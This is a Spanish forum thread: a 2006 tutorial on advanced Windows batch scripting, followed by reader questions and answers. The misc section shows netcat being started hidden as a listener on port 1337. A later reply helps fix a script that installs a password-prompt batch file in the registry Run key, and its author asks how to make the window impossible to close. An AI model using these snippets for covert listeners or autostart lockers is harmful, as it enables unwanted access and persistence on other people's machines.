Programación BATCH Avanzada.

Temario.

- 1.- Variables y Argumentos.
- 2.- Imprimir caracteres de comandos.
- 3.- Algunas otras variables de Entorno.
- 4.- IF
- 5.- FOR
- 6.- Funciones
- 7.- Includes
- 8.- Misc
- 9.- EOF

Variables y Argumentos

El manejo de variables en batch, es muy flexible., y este nos permite hacer desde operaciones matemáticas, hasta seleccionar ciertas partes de una variable, así como reemplazar cadenas de texto, y obtener archivos... Y sus propiedades, la fecha, hora, generar números aleatorios, entre otros.

Los argumentos que recibe un batch, son recibidos de la siguiente forma:

batch argumento1 dos tres

hará que:

%0 = batch

%1 = argumento1

%2 = dos

%3 = tres

en %0 se guardara, el nombre del archivo.

Podemos borrar el contenido de un parámetro con el comando shift:

```
1. @echo off
2. echo %0 %1 %2 %3
3. shift /1
4. echo %0 %1 %2 %3
5.
```

al llamar:

Código

```
    C:\Documents and Settings\Administrador\tempcurso>astring 123
    456 789
    astring 123 456 789
    astring 456 789
```

shift borro, el primer argumento.

Tambien contamos con los siguientes modificadores para los archivos: Código

```
1.
        %~f1
                    - regresa la ruta y el archivo de %1.
2.
         %~d1
                    - regresa la letra de la unidad de %1.
3.
                    - regresa solo la ruta del archivo %1.
        %~p1
                    - regresa solo el nombre de archivo %1.
4.
         %~n1
5.
         %~x1
                    - regresa solo la extension del archivo %1.
         %~s1
                    - regresa solo la ruta, con directorios,
  con nombres cortos del archivo %1.
7.
        %~a1
                - regresa los atributos del archivo.
8.
         %~t1
                    - regresa la hora/fecha del archivo %1
9.
                    - regresa el tamaño del archivo %1.
        %~z1
10.
```

por ejemplo:

en un directorio donde tenemos:

```
    C:\Documents and Settings\Administrador\tempcurso>dir
    El volumen de la unidad C no tiene etiqueta.
    El número de serie del volumen es: A057-553B
    Directorio de C:\Documents and Settings\Administrador\tempcurso
    24/07/2006 12:25a <DIR>
    24/07/2006 12:25a <DIR>
```

```
9. 24/07/2006 12:25a 6 archivo.txt
10. 1 archivos 6 bytes
11. 2 dirs 401,715,161,088 bytes libres
12.
```

este batch:

Código

```
1. @echo off
2. echo Ruta al archivo: %~f1
3. echo Disco: %~d1
4. echo Solo ruta: %~p1
5. echo Nombre: %~n1
6. echo Extension: %~x1
7. echo Ruta Corta: %~s1
8. echo Atributos: %~a1
9. echo Fecha: %~t1
10. echo Tamaño: %~z1
11.
```

llamándolo analiza.bat, saca el siguiente resultado:

Código

```
    C:\Documents and Settings\Administrador\tempcurso>analiza archivo.txt
    Ruta al archivo: C:\Documents and Settings\Administrador\tempcurso\archivo.txt
    Disco: C:
    Solo ruta: \Documents and Settings\Administrador\tempcurso\
    Nombre: archivo
    Extension: .txt
    Ruta Corta: C:\DOCUME~1\ADMINI~1\TEMPCU~1\archivo.txt
    Atributos: --a-----
    Fecha: 24/07/06 12:25a
    Tama±o: 6
```

También podemos usar varias propiedades, por ejemplo, este código: Código

```
1. @echo off
```

```
2.
3. echo %~anxt1
4.
```

saca este resultado:

Código

```
    C:\Documents and Settings\Administrador\tempcurso>analiza archivo.txt
    --a---- 24/07/06 12:25a archivo.txt
```

Si lo que recibimos no es un archivo, sino una cadena de texto, que contiene mas de una palabra, se debe poner entre comillas, algo asi:

astring "parametro de varias letras"

al obtenerlo, en %1, lo recibimos con comillas, pero si usamos:

Código

```
    @echo off
    echo Con Comillas: %1
    echo Sin Comillas: %~1
```

saca este resultado:

Código

```
    C:\Documents and Settings\Administrador\tempcurso>astring
    "parametro de varias letras"
    Con Comillas: "parametro de varias letras"
    Sin Comillas: parametro de varias letras
```

Y por ejemplo, si queremos obtener todos los argumentos, se usa:

%*

es decir:

Código

```
    @echo off
    a. echo Argumentos: %*
```

al ejecutar:

astring parametro de varias letras

nos regresa:

Código

- 1. C:\Documents and Settings\Administrador\tempcurso>astring parametro de varias letras
- 2. Argumentos: parametro de varias letras

Para asignar a una variable, el valor de algo escrito por el usuario, puedes usar:

```
set /P variable=
```

por ejemplo: Código

```
    @echo off
    echo ¿Como te llamas?
    set /P miva=
    echo Tu te llamas %miva%
    echo Tu te llamas %miva%
```

hara algo asi:

Código

```
1. C:\Documents and Settings\Administrador\tempcurso>astring
```

```
2. ┐Como te llamas?
```

- 3. Juan
- 4. Tu te llamas Juan

5.

Ahora, si por ejemplo, queremos, hacer algo como, obtener las ultimas 3 letras del nombre:

Código

```
    @echo off
    echo Escribe tu Nombre
    set /P NOM=
    echo %NOM:~-3%
```

Aqui lo que estamos haciendo en la ultima linea:

```
%NOM:~-3%
```

hara, obtener los ultimos 3 caracteres, como si se tratara de la funcion substring.

por ejemplo, esto:

```
%NOM:~1,3%
```

obtendra del segundo al cuarto caracter. (empiezas desde 0, recuerda)

Para reemplazar cadenas, dentro de otra variable, es la siguiente sintaxis:

Código

```
    @echo off
    echo Escribe una frase
    set /P FRA=
    echo %FRA:e=XXX%
```

esto reemplazara las letras "e" por "XXX".

Para hacer calculos matematicos, se usa el modificado /A, de esta forma:

```
1. @echo off
2. set /A x=1
3. echo %x%
```

```
4. <u>set</u> /A x=x*9
5. <u>echo</u> %x%
6.
```

tenemos las siguientes operaciones disponibles:

Código

```
1. ()
2. * / %
                  - agrupar
                  - operadores aritméticos
3. + -
                  - operadores aritméticos
4. << >>
                  - mayús lógica
5. &
                   - AND
6. ^
                   - XOR
7. |
                   - OR
8. = *= /= %= += -= - asignación
9. &= ^= |= <<= >>=
                  - separador de expresión
10. ,
11.
```

Con este podemos usar numeros hexadecimales de la siguiente forma: Código

```
    @echo off
    set /A x=2
    echo %x%
    set /A x=x*0xff
    echo %x%
```

al colocar $\mathbf{0x}$ estamos especificando, que a continuacion se pondra un valor hexadecimal.

Imprimir caracteres sin usar comandos

Ahora, se preguntaran, en las variabes, siempre usamos los signos % Como imprimes uno?

veamos:

```
1. @echo off
2. set x=pru
3. set pru=HOLA
5. :: Esto imprimira el contenido de x
6. echo %x%
7.
8. ::Esto imprimira la letra x
9. echo x
10.
11. ::Esto imprimira %x%
12. echo %%x%%
13.
14. ::Esto imprimira el valor de x entre %%
15. echo %%%x%%%
16.
17. :: Lo mismo
18. echo %pru%
19. <u>echo</u> %%pru%%
20. <u>echo</u> %%%pru%%%
21.
```

En resumen, si quieren imprimir, el caracter %, deben colocarlo 2 veces.

```
Para otros caracteres, que ejecutan alguna accion en batch como: &
```

<

>

debes colocar este caracter antes:^

por ejemplo:

Código

```
1. echo <html><h1>Hola</h1></html> >index.html
2.
```

no funcionara, pero:

```
1. echo ^<html^>^<h1^>Hola^</h1^>^</html^> >index.html
2.
```

dara: Código

- 1. C:\Documents and Settings\Administrador\tempcurso>type
 index.html
- 2. <html><h1>Hola</h1></html>

3.

Algunas otras variables de entorno

Tenemos otras variables de entorno que podrian servir, ademas de las comunes de ALLUSERSPROFILE y HOMEPATH, por ejemplo:

Código

```
    @echo off
    echo Directorio Actual: %CD%
    echo Fecha: %DATE%
    echo Hora: %TIME%
    echo Numero Aleatorio: %RANDOM%
    6.
```

dara como resultado:

```
    C:\Documents and Settings\Administrador\tempcurso>astring
    Directorio Actual: C:\Documents and
        Settings\Administrador\tempcurso
    Fecha: Lun 24/07/2006
    Hora: 2:13:49.33
    Numero Aleatorio: 24523
    C:\Documents and Settings\Administrador\tempcurso>astring
    Directorio Actual: C:\Documents and
        Settings\Administrador\tempcurso
    Fecha: Lun 24/07/2006
    Hora: 2:13:51.60
    Numero Aleatorio: 3681
```

Otras instrucciones muy utiles, serian POPD y PUSHD, que sirven para guardar y regresar al directorio actual, por ejemplo:

Código

```
1. @echo off
2. echo %CD%
3. PUSHD \
4. echo %CD%
5. POPD
6. echo %CD%
7.
```

PUSHD funciona de la siguiente manera:

Guarda el directorio actual., y va a la ruta especificada.

POPD regresa al directorio guardado por PUSHD

podemos usarlos uno dentro de otro, asi:

Código

```
1. @echo off
2. echo %CD%
3. PUSHD \
4. echo %CD%
5. PUSHD %homepath%
6. echo %CD%
7. POPD
8. echo %CD%
9. POPD
10. echo %CD%
```

IF

If, reconoce varias situaciones:

valores de error comparar cadenas existencia de archivos comparaciones matematicas

como ya sabemos %ERRORLEVEL% almacena algunos valores de otras funciones.

al hacer

IF ERRORLEVEL 1 @echo ok ELSE @echo no

estariamos preguntando si ERRORLEVEL es 1, si lo es imprime OK, si no, imprime NO.

tambien podemos comparar cadenas, por ejemplo:

Código

```
    @echo off
    <u>IF</u> "%~1"=="hola" echo hola
    .
```

usamos $%\sim1$ para que aunque el usuario ponga comillas, no salga error ;)

Código

```
    @echo off
    IF /I "%~1"=="hola" echo hola
    .
```

este codigo, solo responde si dices hola CON minusculas. /I es para hacer mas estricta la comparacion.

ahora, podemos usar IF en varias lineas:

```
1. @echo off
2. IF EXIST %~snx1 (
3. echo EXISTE!
```

```
4. ) ELSE (
5. echo NO EXISTE
6. )
7.
```

con parentesis ().

si vamos a usar comparaciones numericas, debemos usar los siguientes codigos de comparación:

Código

```
1.

2. EQU - igual

3. NEQ - no igual

4. LSS - menor que

5. LEQ - menor que o igual

6. GTR - mayor que

7. GEQ - mayor que o igual

8.

9.
```

por ejemplo:

Código

```
1. @echo off
2. echo Cual es tu edad?
3. SET /P m=
4. IF %m% GEQ 18 (
5. echo ERES MAYOR DE EDAD
6. ) ELSE (
7. echo NO ERES MAYOR DE EDAD
8. )
9.
```

que regresa:

```
    C:\Documents and Settings\Administrador\tempcurso>acon
    Cual es tu edad?
    19
```

```
4. ERES MAYOR DE EDAD5.6. C:\Documents and Settings\Administrador\tempcurso>acon7. Cual es tu edad?8. 179. NO ERES MAYOR DE EDAD10.
```

Tambien podemos saber si una variable ya fue definida:

Código

```
1. IF DEFINED var (
2. echo SI
3. ) ELSE (
4. echo NO
5. )
```

FOR

FOR es una herramienta muy completa, nos permite analizar segmentos de la salida de comandos, funciones y el contenido de archivos.

Tambien permite hacer bucles de la siguiente manera:

Código

```
1. \underline{FOR} /L %%var \underline{IN} (inicio, incremento, fin) \underline{DO} (acciones)
```

inicio, es el valor inicial, incremento es la cantidad a sumar, y fin es la cantidad a detenerse, por ejemplo:

Código

```
1. <u>FOR</u> /L %%i <u>IN</u> (0,1,10) <u>DO</u> (<u>echo</u> %%i)
```

imprimira 0 1 2 3 4 5 6 7 8 9 10

sinembargo, la forma mas sencilla de usar FOR, es para numerar archivos, y hacer algo con ellos.. por ejemplo:

```
1. FOR \%\%x in (x*) DO echo \%\%x
```

mostrará todos los archivos que empiezan con x.

para SOLO mostrar directorios: Código

```
1. FOR /D %%x in (m*) DO echo %%x
```

el modificador "/D", mostrará solo los directorios, que empiesen con m.

El comando se puede hacer "recursivo", es decir, que se ejecute dentro de cada directorio, con el comando "/R", por ejemplo, en una estructura de directorios como la siguiente:

Código

```
    ├───adios
    │ └───algo
    │ └───xx
    └──bola
```

al ejecutar el comando: Código

```
    FOR /R /D %%x in (a*) DO echo %%x
    C:\adios
    C:\adios\algo
```

sinembargo, al ejecutar el comando.. Código

```
    FOR /R %%x in (*x*) DO echo %%x
    C:\ax.txt
    C:\adios\sx.txt
    C:\adios\wwx.txt
    C:\adios\algo\kkx.txt
    C:\adios\algo\xx\xx.txt
    C:\hola\ax.txt
    C:\hola\ax.txt
```

nos mostrara todos los archivos que coinciden con la sequencia especificada, incluso podriamos hacer un buscador en batch, con el uso de FINDSTR y FOR.

Tenemos otro modificador, /F que nos permite usar ciertas opciones para separar el resulado de las acciones.. comandos, cadenas, o archivos. Su sintaxis es la siguiente:

Código

```
1. FOR /F ["opciones"] %var IN (conjunto) DO (acciones)

conjunto puede ser:
conjunto de archivos -> sin comillas
cadena de caracteres -> con comillas dobles (" ")
comando -> con comilla simple (' ')
```

las opciones son las siguientes:

<u>eol</u> -> todo lo que este despues de este caracter sera ignorado (para cada linea)

<u>skip</u> -> numero de lineas a saltarse al principio del archivo/comando. <u>delims</u> -> esto sirve para separar las strings.. si no se coloca esta opcion, se usaran como separadores "espacio" y "tab"

<u>tokens</u> -> esto es para especificar cuales segementos, delimitados por "delims", seran pasados a las variables.. por ejemplo:

1,2,3

solo pasara los primeros 3 segmentos.

1,2*

pasara 2 segmentos, el primero y todo lo que este despues (el * regresa todo el resto de la linea)

1,2-6,8,9*

regresara 4 segmentos, el primero, desde el segundo hasta el sexto, el octavo y el resto de la linea, despues del noveno, el signo de menos (-) genera intervalos.

por ultimo, esta la opcion:

<u>usebackq</u> -> que cambia la forma de interpretar si es string o comando, de la siguiente manera:

'cadena' `comando`

Nota: [`] es diferente al caracter de acento [']

por ejemplo, el siguiente comando:

Código

```
1. FOR /F "tokens=1,3-5,7-9,10* delims= " %%i IN ("George no es malvado, es bondadoso, siempre piensa en los demas.") DO echo %%i %%j %%k %%l tonto, %%m %%n %%o matar a %%p %%q
```

dara de resultado: Código

1. George es malvado, es tonto, siempre piensa en matar a los demas.

Funciones

El uso de argumentos, de etiquetas y de filtros nos ayuda mucho al momento de escribir un codigo.

Muchos creen que las etiquetas solo sirven para los goto.. sinembargo una etiqueta puede servir de funcion y recibir parametros.

miren, el siguiente programa: Código

```
    @echo off
    call:funcion 1 2 3
    call:funcion %*
    goto:EOF
    :funcion
    echo Estoy en: %~nx0-^>%0 %*
```

al ser llamado, por ejemplo en: Código

```
    C:\>ejemplo
    Estoy en: ejemplo.bat->:funcion 1 2 3
    Estoy en: ejemplo.bat->:funcion
```

el primero muestra los parametros enviados por el batch (1 2 3), y el segundo los parametros enviados al programa. en este otro ejemplo:

Código

```
    C:\>ejemplo HOLA MUNDO
    Estoy en: ejemplo.bat->:funcion 1 2 3
    Estoy en: ejemplo.bat->:funcion HOLA MUNDO
```

la funcion obtiene tambien los argumentos del programa.

hasta ahora.. todo es igual a usar goto a excepcion del uso de argumentos, sinembargo.. si queremos hacer un.. "return", se hace usando:

goto:EOF

entonces, en situaciones como: Código

```
1. @echo off&call:main&goto:EOF
2.
3. :suma
4. set /A res=%1 + %2
5. echo %res%
6. goto: EOF
7.
8. :resta
9. set /A res=%1 - %2
10. echo %res%
       goto:EOF
11.
12.
13. :multiplica
14. set /A res=%1 * %2
15. <a href="mailto:echo">echo</a> %res%
16.
     goto:EOF
17.
18.
    :main
19.
     set /P arg=Escribe 2 numeros separados por un espacio
     echo %arg%
20.
21.
     echo su suma es:
22.
       call:suma %arg%
23.
24.
     echo su resta es:
25.
     call:resta %arg%
26.
27.
     echo su producto es:
```

como podemos ver goto:EOF se usa para regresar al orden de comandos.

el resultado es algo asi:

Código

```
1. C:\>operaciones
2. Escribe 2 numeros separados por un espacio 6 2
3. 6 2
4. su suma es:
5. 8
6. su resta es:
7. 4
8. su producto es:
9. 12
10.
```

Includes

Para hacer un "include" oincluir un archivo, solo debes llamarlo asi: archivo_a_incluir.bat funcion argumentos y en el archivo a incluir, debe de estar al principio: @echo off&call:%*&goto:EOF

queda algo asi: Código

```
1. @echo off&call:%*&goto:EOF
2. :funcion1
3. ...
4. :funcion2
5. ...
6.
```

por ejemplo:

--inclu.bat--Código

```
1. @echo off&call:%*&goto:EOF
2.
3. :cabeza
4. echo ##############
5. echo # Hecho por: #
6. echo # sirdarckcat #
7. echo ##############
8. goto:EOF
9.
10. :uso
13. goto:EOF
14.
15. :nombre
18.
```

--inicio.bat--Código

```
1. @echo off
2. if "%~1"=="" (
3. inclu.bat cabeza
4. inclu.bat uso
5. ) else (
6. inclu.bat nombre %~1
7. )
8.
```

esto daria este resultado:

```
1. C:\>inicio
2. ############
3. # Hecho por: #
4. # sirdarckcat #
```

Misc

13.

Algunos filtros y comandos interesantes:

• comando | more

muestra el resultado del comando de forma paginada

• comando | sort

muestra el resultado del comando de forma ordenada

• TITLE "algo"

cambia el titulo de la ventana de CMD

• SUBST ruta/a/alguna/carpeta [letra unidad]

asgina a letra_unidad la ruta de acceso

• FIND "cadena"

busca cierta cadena en un archivo (se puede usar como filtro), con el modificador /v encuentra solo las que NO tienen la linea especificada. (para mas info, escribe en CMD: FIND /?)

• FINDSTR

extension de FIND, acepta expresiones regulares, y busqueda general (lo mas parecido que DOS tiene a grep), descripción detallada: Código

```
1. Busca cadenas en los archivos.
```

2.

- 3. FINDSTR [/B] [/E] [/L] [/R] [/S] [/I] [/X] [/V] [/M] [/O] [/P]
- 4. [/F:archivo]
- 5. [/C:cadena] [/G:archivo] [/D:lista de directorios]
 [/A:atributos de color]
- 6. [cadenas] [[unidad:][ruta]nombredearchivo[...]]
- 7.
- 8. /B Hace coincidir los modelos si están al principio de la línea.
- 9. /E Hace coincidir los modelos si están al final de la línea.
- 10. /L Literalmente utiliza cadenas de búsqueda.
- 11. /R Utiliza cadenas sde búsqueda como expresiones regulares.
- 12. /S Busca archivos que coinciden en el directorio actual y en todos
- 13. los subdirectorios.
- 14. /I Especifica que la búsqueda no distingue mayúsculas de minúsculas.
- 15. /X Imprime lineas que coinciden con exactitud.
- 16. /V Sólo imprime líneas que no contienen una correspondencia.
- 17. /N Imprime el número de la línea antes de la línea que coincide.
- 18. /M Sólo imprime el nombre de archivo si el archivo contiene una
- 19. correspondencia.
- 20. /O Imprime un carácter de desplazamiento antes de las líneas que
- 21. coinciden.
- 22. /P Omite archivos <u>con</u> caracteres que no son imprimibles
- 23. /A:attr Especifica atributos de color <u>con</u> dos dígitos hexadecimales. Ver
- 24. "color /?"
- 25. /F:archivo Lee la lista de archivos desde el archivo especificado
- 26. (/ significa consola).
- 27. /C:cadena Utiliza una cadena especificada como una búsqueda de cadena
- 28. literal.
- 29. /G:archivo Coje la búsqueda de archivos desde el archivo especificado
- 30. (/ significa consola).

```
Busca un signo de punto y coma de la lista
31.
         /D:dir
  delimitada de
32.
                  directorios
33.
       cadenas Texto que se debe buscar.
34.
        [unidad:][ruta]nombredearchivo
35.
                   Especifica un archivo o archivos que buscar.
36.
37.
       Utiliza espacios para separar múltiples cadenas de
  búsqueda a no ser que
       el argumento lleve un prefijo con /C. Por ejemplo,
   'FINDSTR "qué tal" x.y'
       busca "qué" o "tal" en el archivo x.y. 'FINDSTR /C:"qué
  tal" x.y' busca
       "qué tal" en el archivo x.y.
40.
41.
42.
      Expresión regular de referencia rápida:
                 Comodín: cualquier carácter
43.
                  Repetir: cero o más ocurrencias de un carácter
44
  previo o de clase
45.
                 Posición de línea: comienzo de la línea
46.
                Posición de línea: fin de línea
47.
        [clase] Clase de carácter: cualquier carácter en la
48.
        [^class] Clase inversa: cualquier carácter que no esté
  en la serie
49.
         [x-y]
                Intervalo: cualquier carácter que esté dentro
  del intervalo
50.
                especificado
51.
         \backslash X
                Escape: uso literal de un metacarácter x
52.
         \<xyz Posición de palabra: principio de palabra
53.
         xyz\> Posición de palabra: fin de palabra
54.
55.
      Para obtener una información más completa sobre
  expresiones regulares de
56.
       FINDSTR referirse al Comando de referencia Command en
  línea.
57.
58.
```

• start "titulo ventana nueva" [OPCIONES] comando argumentos

START tiene mas opciones de las que son usadas comunmente. "titulo ventana nueva" especifica el titulo de la ventana que se generará.

las opciones entre otros contienen:

/Druta - el programa inicia en el directorio..

/B - la aplicación se inicia sin ventana

/I - se inicia la aplicacion con el entorno original, es decir las modificaciones al entrono hechas en esta sesion, no afectaran el nuevo programa

/MIN - La nueva ventana se inicia minimisada

/MAX - La nueva ventana se inicia maximisada

/SEPARATE - El programa se inicia en una zona de memoria separada /SHARED - El programa se inicia en una zona de memoria compartida

Iniciar en prioridades:

```
/LOW - baja
/NORMAL - normal
/HIGH - alta
/REALTIME - tiempo real
/ABOVENORMAL - sobre lo normal
/BELOWNORMAL - debajo de lo normal
```

/WAIT - Inicia el programa, y espera hasta que termine de ejecutarse

por ejemplo, si quieren abrir un programa sin generar una ventana, por ejemplo netcat, podrian hacer algo asi:

```
start /B /SEPARATE /HIGH /I /D %WINDIR% nc -L -p 1337 |exit
```

que lo inicia en una zona de memoria separada, con prioridad alta, en el contexto original, y en %windir%

EOF

EOF es una etiqueta que define el fin del archivo, sirve para terminar funciones, y en este caso, solo sirve para terminar el documento :), espero les sirva ;)

(c) Sirdarckcat 2006

Autorizo la reproducción total o parcial de este documento bajo la licencia de documentación libre de GNU (GFDL), una copia puede ser encontrada en http://www.gnu.org/licenses/fdl.txt

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Ilorev en 19 Diciembre 2006, 21:14

Heyyy esta muy bueno !! lo voy a leer cuando tenga tiempo ;D ;D ;D ;D

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Hendrix en 19 Diciembre 2006, 22:47

Y esto es de julio del 2006???? :-\ :-\ :-\

Clap, Clap, Clap....fenomenal!!!!;D;D

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: sirdarckcat en 20 Diciembre 2006, 01:03

Estama oculto en papelera xD, (pero incompleto), por eso dice julio 2006 :P

Saludos!!

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Apache14 en 20 Diciembre 2006, 02:47

Oye Sirdarckcat has hecho un gran aporte a la humanidad, la verdad ya llevo tiempo programando en Batch y nunca habia visto algo igual, se te agradece man.

(http://img289.echo.cx/img289/513/matrix19ze.gif)(http://img289.echo.cx/img289/2485/matrix21ta.gif)

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: kanzix en 24 Diciembre 2006, 16:40

Exelente sdc!! te a quedado muy bien :P

salu2 ;D

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: ne0x en 26 Diciembre 2006, 19:38

La verdad es que es lo que busacaba, la unica forma de progresar un poco en batch era investigar en la shell, esta muy bien este manual.

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Kefren en 28 Marzo 2007, 12:53

Seee, yo tambien buscaba algo asi, gracias Sirdarckcat

SaluDOS

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Ture en 28 Junio 2007, 23:50

buenas caballero xq no me funciona esto?

@echo off
set hola=time /T
time /T
echo %hora%

por qué me da esto? C:\>jan.bat 23:50 time /T

C:\>

y no C:\>jan.bat 23:50 23:50

C:\>

muchas gracias caballero!

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: sirdarckcat en 29 Junio 2007, 01:37

no funciona porque no puedes eso :P usa:

%TIME%

eso siempre te regresa la hora.

Saludos!!

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Luzbelitox en 30 Junio 2007, 05:20

felicitaciones Sirdarckcat, tenia problemas con el for pero ya estoy entendiendo mejor.. qracias! y saludos!

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Ture en 30 Junio 2007, 22:03

creo que no me explique bien con el ejemplo sorry, lo que yo quiero hacer es en una variable string meter el resultado del output de un programa, ya sea el time, como el date o el ture.exe que me devuelve un numero aleatorio del 1 al 10

muchas gracias!!!

PD: lo estoy haciendo actualmente con la dll de cygwin y usando la potencia de bash, pero me gustaría dejar un .bat limpito y no usar ese tipo de ñapas

saludos!

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: sirdarckcat en 30 Junio 2007, 23:45

Puedes usar FOR...

FOR /F "" %%i IN ('time /T') DO set hola=%%i

Saludos!!

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Ture en 10 Julio 2007, 20:46

tio eres un crack!;) muchísimas gracias, es cojonudo tu tuto

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: TxShack en 11 Julio 2007, 15:11

Bueno, queria saber si me podriais ayudar con este batch

Lo que quiero es que se añada al registro run pero no consigo hacerlo... algo debo de acer malalgo.. pero no se que... ace muchisimo que no uso los batch, porq se me daban bien.. pero se me an olvidado cosas poco a poco y aora no me sale esto

El codigo que qiero q salga es este:

```
Citar
@echo off
:menu
echo.
echo INTRODUCIR CLAVE
echo.
set/p clave=
if %clave%==fark (goto bien) else goto :menu
:bien
cls
echo.
echo ACCESO VALIDADO
echo.
pause
exit
```

Lo e estado intentando varias veces pero no lo consigo... e provado esto.. poro no funciona

```
Citar
@echo off
cd c:\
echo @echo off > pass.bat
echo :menu >> pass.bat
echo echo. >> pass.bat
echo INTRODUCIR CLAVE >> pass.bat
echo echo. >> pass.bat
echo echo. >> pass.bat
echo echo :>> pass.bat
echo if %clave= >> pass.bat
echo if %clave%==fark (goto bien) else goto :menu >> pass.bat
echo :bien >> pass.bat
echo :cls >> pass.bat
echo echo. >> pass.bat
echo echo. >> pass.bat
echo echo ACCESO VALIDADO >> pass.bat
echo echo. >> pass.bat
```

echo pause >> pass.bat
echo exit >> pass.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v
pass.bat /t reg_sz /d C:\ /f
start c:\pass.bat
exit

Estare aciendo algo mal.. pero no se que... la cuestion es q no funciona..

Provadlo y vereis, y si me podeis ayudar os lo agradeceria ^^

bueno, y una ultima cosa... q tendria q añadirle para que quien lo ejecute no pueda dar a la X.. osea, q si intenta cerrar no pueda. Gracias

Un saludo

TxShack

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: It@c|-|i en 30 Julio 2007, 18:10

buenas TxShack ya han pasado unos dias ... espero no responder tarde esto xD soy nuevo por aca pero por si aun no lo encuentras.. no es tan dificil solo que apenas lei tu post :P hace nos minutos...

solo usaste un poco mal la adicion al registro y una de tus lineas esta mal

tu linea mal es esta le falta el echo

Citar

echo INTRODUCIR CLAVE >> pass.bat

cambiala por

echo echo INTRODUCIR CLAVE >> pass.bat

y la linea del registro va asi...

Citar

reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v pass /t reg_sz /d C:pass.bat /f

recuerda que /v asigna el nombre del valor a agregar y en /d el archivo a ejecutar porque si lo dejas en c:\ solo abriras el explorer en C.. cuidate ..

-----modificado-----

ohhh se me olvido una linea mas pero aca esta

Citar

echo if %clave%==fark (goto bien) else goto :menu >> pass.bat

esa linea no va a escribir en tu archivo asi por los % necesitas aumentarle otro mas a cada uno para que en el otro archivo escriba los %, esta de abajo debes usar:

Citar

echo if %%clave%%==fark (goto bien) else goto :menu >> pass.bat

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: TxShack en 31 Julio 2007, 12:16

Muchas gracias por la ayuda... del fallo del echo echo INTRODUCIR CLAVE me di cuenta mas tarde, pero de los otros no ^^

Gracias de nuevo

Un saludo

TxShack

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: jaimico195 en 4 Agosto 2007, 23:40

una preguntita jeje esta medio tonta pero espero no fastidiarlos ni quitarles el tiempo jeje esque soy nuevo pero ya lei varios manuales de batch pero me segui a este pero no lo entiendo, el principio se me dificulta.

miren mi code no me funciona:

echo me llamo mico, mi edad es de 15 años echo %3 %5 %8 %9

y quisiera que salga mico, edad 15 años pero me dice algo asi "echo esta activado"

lo he hecho con varios codigos diferentes, añadiendole @echo off cambiado cositas pero siempre me aparece "echo esta activado", espero que me puedan ayudar esque yo me vaso en los ejemplos(los codigos) porque los modifico y los entiendo entonces si me ponen un codigo que si me muestre eso que puse ya con eso sigo con el manual jeje gracias. saludos jaimico195

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Siuto en 4 Agosto 2007, 23:48

Cuando usas %1, %2, ..., 9% te estas refiriendo a los argumentos que estas pasandole al programa proba lo siguiente:

Código:

@echo off

echo %3 %5 %8 %9

A este programa pasale como argumento *me llamo mico, mi edad es de 15 años*

Ahi si tendria que funcionar (En los argumentos no copie el echo). Si no se entiende avisa que se explica mejor entonces...

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: jaimico195 en 5 Agosto 2007, 00:12

jeje la verdad no le entendi donde poner me llamo mico, mi edad es de 15 años

la verdad nunca entendi que es el argumento deseguro muchas veces lo aplico pero no se como se llama

me podrias poner un completo ya con todo y el argumento osea que es todo lo que tengo que hacer porque si me pones c:\mico>>lo que sea y eso no entiendo ni que es, solo entiendo que es >> que es que se va a poner en la siquiente linea del texto que escoja, soy medio malo para entenderle jeje, hasme un miniejercicio porfa si tienes tiempo jeje esque no me gusta molestar mucho por mi lentitud de aprendizaje jeje.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Siuto en 5 Agosto 2007, 01:01

Los argumentos del programa se especifican cuando lo corres desde el MS-DOS por ejemplo.

Para abrir el programa desde MS-DOS por ejemplo guarda tu archivo.bat en C:\archivo.bat y luego hace lo siguiente:

Código:

Inicio >> Ejecutar... >> cmd >> C:\archivo.bat

ahi lo que hiciste fue abrir el archivo desde MS-DOS sin pasar ningun argumento al mismo.

Para pasarle argumentos al archivo.bat tenes que seguir los mismos procedimientos pero en el mosmendo que estas en la ventana de MS-DOS escribis

Código:

C:\archivos.bat me llamo mico, mi edad es de 15 años

Ahi le estarias pasando al archivo.bat 9 argumentos distintos.

Donde me es el argumento %1 llamo ... %2 mico ... %3 Y asi sigue hasta el %9

Me explique mejor ahora? Cualquier duda consulta...

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: jaimico195 en 5 Agosto 2007, 01:37

ok, ahora ya tengo argumentos en mi hola.bat mira hice esto:

Código:

c:\echo hola como estas>hola.bat

ok ahora ya vi el archivo y solo dice "hola como estas"

ahora que hago para que muestre %1 y %3 osea que le pongo para que muestre los argumentos de ese archivo

creo un .bat y en el le pongo esto

Código:

c:\hola.bat
echo %1 %3

jeje perdon por las preguntas ya me da verguenza escribir a la proxima te escribo por mensaje privado.

editado:

si quiero mostar los argumentos de un mismo bat:

Códiao:

echo hola como estas echo %1 %3

como hago esto esta mal yo se como hago para que este bien

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Siuto en 5 Agosto 2007, 08:32

No, ya no entiendo la pregunta, separa los parrafos y usa las etiqeutas de (https://foro.elhacker.net/Themes/default/images/bbc/code.gif) (Insertar Código) para los mismos.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: jaimico195 en 8 Agosto 2007, 07:58

